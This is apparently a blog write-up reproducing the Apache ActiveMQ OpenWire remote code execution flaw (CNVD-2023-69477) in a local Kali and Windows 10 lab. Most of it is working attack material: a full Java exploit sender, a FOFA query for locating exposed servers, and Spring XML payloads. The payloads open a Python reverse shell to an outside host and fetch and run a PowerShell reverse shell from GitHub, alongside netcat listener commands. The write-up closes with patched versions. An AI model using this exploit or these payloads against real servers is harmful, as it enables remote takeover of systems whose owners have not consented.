Apache ActiveMQ remote code execution RCE vulnerability recurrence (CNVD-2023-69477)
The vulnerability that was discovered last week is a good time to reproduce it and record it.
1.Vulnerability description
A remote code execution vulnerability exists in Apache ActiveMQ. A remote attacker with access to the Apache ActiveMQ server TCP port (default is 61616) can execute arbitrary code by sending malicious data to the server.
影响版本
Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
fofa syntax:
app="APACHE-ActiveMQ" && port="61616"
2.Environment setup
Here I reproduced it locally, using kali and win10
Install ActiveMQ
Visit:https://activemq.apache.org/
, download any vulnerable version
What I downloaded here is the apache-activemq-5.15.10 version
Unzip and enter the bin directory
use:
activemq start #启动
Visithttp://127.0.0.1:8161
and you can see that the environment started successfully
3. Vulnerability recurrence
access:https://github.com/sincere9/Apache-ActiveMQ-RCE/tree/main/exp
After downloading, enter the /exp folder, see ActiveMQ.java, and modify your IP address, win10:192.168.2.129
,kali192.168.2.131
import java.io.*;
import java.net.Socket;
public class ActiveMQ {
public static void main(final String[] args) throws Exception {
System.out.println("[*] Poc for ActiveMQ openwire protocol rce");
String ip = "192.168.2.129";
int port = 61616;
String pocxml= "http://192.168.2.131:8000/poc.xml";
Socket sck = new Socket(ip, port);
OutputStream os = sck.getOutputStream();
DataOutputStream out = new DataOutputStream(os);
out.writeInt(0); //无所谓
out.writeByte(31); //dataType ExceptionResponseMarshaller
out.writeInt(1); //CommandId
out.writeBoolean(true); //ResponseRequired
out.writeInt(1); //CorrelationId
out.writeBoolean(true);
//use true -> red utf-8 string
out.writeBoolean(true);
out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");
//use true -> red utf-8 string
out.writeBoolean(true);
out.writeUTF(pocxml);
//call org.apache.activemq.openwire.v1.BaseDataStreamMarshaller#createThrowable cause rce
out.close();
os.close();
sck.close();
System.out.println("[*] Target\t" + ip + ":" + port);
System.out.println("[*] XML address\t" + pocxml);
System.out.println("[*] Payload send success.");
}
}
Then modify the xml file:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>python</value>
<value>-c</value>
<value><![CDATA[import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("niubi.com",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")]]></value>
</list>
</constructor-arg>
</bean>
</beans>
Then start the command
python3 -m http.server 8000 #启动http监听
nc -lvvp 9999 #监听端口
javac ActiveMQ.java #编译
java ActiveMQ #运行
However, the poc.xml file is indeed called here but there is no rebound shell.
So try ping dnslog
Modify xml
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>ping</value>
<value>t1298j.dnslog.cn</value>
</list>
</constructor-arg>
</bean>
</beans>
Here we see that the DNSlog platform does have an echo, proving that the command was executed.
So I tried to find a way to rebound the shell. I thought that the Windows rebound shell command might be different, so I used powershell to rebound the shell.
Modify the poc.xml file:
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>powershell</value>
<value>-c</value>
<value><![CDATA[IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.131 -Port 23333]]></value>
</list>
</constructor-arg>
</bean>
</beans>
Listen and run exp again
You can see the successful rebound shell
PS: During the shell rebound process, it did not pop up at first, so I entered \apache-activemq-5.15.10\data
, checked the activemq.log log information, and found the termination link
So I turned off the win10 firewall, defend, etc., turned on the log log4j.logger.org.apache.activemq=DEBUG, and then checked the logs to solve the problem. Only here did I successfully rebound the shell.
4.Bug fix
Currently, the official has fixed this vulnerability by restricting the deserialization class to only be a subclass of Throwable. It is recommended that affected users update to:
Apache ActiveMQ >= 5.18.3
Apache ActiveMQ >= 5.17.6
Apache ActiveMQ >= 5.16.7
Apache ActiveMQ >= 5.15.16